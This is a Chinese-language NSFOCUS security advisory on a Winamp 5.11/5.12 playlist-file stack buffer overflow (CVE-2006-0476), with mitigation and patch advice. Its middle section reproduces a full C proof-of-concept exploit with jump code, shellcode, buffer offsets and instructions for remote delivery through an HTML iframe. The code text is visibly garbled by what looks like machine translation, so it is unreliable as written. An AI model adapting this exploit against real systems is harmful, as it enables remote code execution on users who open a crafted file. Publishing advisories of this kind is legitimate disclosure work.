安全研究
安全漏洞
Nullsoft Winamp畸形播放列表文件处理远程缓冲区溢出漏洞
发布日期:2006-01-31
更新日期:2006-02-06
受影响系统:
Nullsoft Winamp 5.11不受影响系统:
Nullsoft Winamp 5.13描述:
BUGTRAQ ID: 16410
CVE(CAN) ID: CVE-2006-0476
Winamp是Nullsoft发布的免费音频播放器,支持多种音频格式。
Winamp在处理播放列表文件时存在缓冲区溢出漏洞。攻击者可以构造超长的完整路径,该路径可以是实际上并不存在的文件共享的文件名或UNC名。如果用户打开了上述文件的话,就会覆盖栈缓冲区,导致执行任意代码。
<*来源:Alan Mccaig (b0fnet@yahoo.com)
ruben unteregger (ruben.unteregger@era-it.ch)
链接:http://www.us-cert.gov/cas/techalerts/TA06-032A.html
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=377
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Unpatched/0day/* * * Winamp 5,12 remote Buffer OVERFLOWS
universal Exploit (Zero Day) * nose discovered & exploit coded by
ATmaCA * Web: http://www.spyinstructors.com &&
http://www.atmacasoft.com * E-Mail: atmaca@icqmail.com * Credit
ton of Kozan * *// * * * Tested with: * Winamp 5,12 on
Win XP pro Sp2 * *// * * Usage: * * Execute exploit, it wants
create "crafted.pls" in current directory. * Duble click
the file, or single click right and then SELECT "open". *
And Winamp wants launch A Calculator (calc.exe) * *// * * * For
ton use it remotly, * make A HTML page containing to iframe linking
ton the pls file. * *
http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm * */#
include < windows.h > # include < stdio.h > # DEFINE BUF_LEN 0x045D #
DEFINE PLAYLIST_FILE "crafted.pls" char szPlayListHeader1[ ] = "[
playlist]\r\nFile1 =\\\\"; char szPlayListHeader2[ ] =
"\r\nTitle1=~BOF~\r\nLength1=FFF\r\nNumberOfEntries=1\r\nVersion=2\r\n";
//Jump ton shell code char jumpcode[ ] =
"\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4"; //Harmless
Calc.exe char shellcode[ ] =
"\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
"\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
"\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4"
"\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12"
"\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69"
"\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6"
"\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5"
"\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21"
"\x61\xdd\x0e\x4d"; int argc, char * argv[ ]) {printf("\nWinamp
5,12 remote Buffer OVERFLOW main(int universal Exploit");
printf("\nBug discovered & coded by ATmaCA exploit");
printf("\nWeb: http://www.spyinstructors.com &&
http://www.atmacasoft.com"); Printf("\nE Mail:
atmaca@icqmail.com"); printf("\nCredit tons of Kozan");
FILE * file; char * pszBuffer; if ((file =
fopen(PLAYLIST_FILE, "w+b")) == ZERO) {printf("\n [ Err: ]
fopen()"); exit(1); } more pszBuffer =
(char*)malloc(BUF_LEN); more memset(pszBuffer, 0x90, BUF_LEN);
more memcpy(pszBuffer, szPlayListHeader1,
sizeof(szPlayListHeader1) 1); memcpy(pszBuffer+0x036C, shell
code, sizeof(shellcode) 1); memcpy(pszBuffer+0x0412, jumpcode,
sizeof(jumpcode) 1); memcpy(pszBuffer+0x0422,
szPlayListHeader2, sizeof(szPlayListHeader2) 1); more
fwrite(pszBuffer, BUF_LEN, 1, file); fclose(File);
printf("\n\n" PLAYLIST_FILE "has been created into the current
directory.\n"); return 1; }
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 删除m3u和pls文件扩展名的关联。
厂商补丁:
Nullsoft
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.winamp.com/player/
浏览次数:3611
严重程度:0(网友投票)
绿盟科技给您安全的保障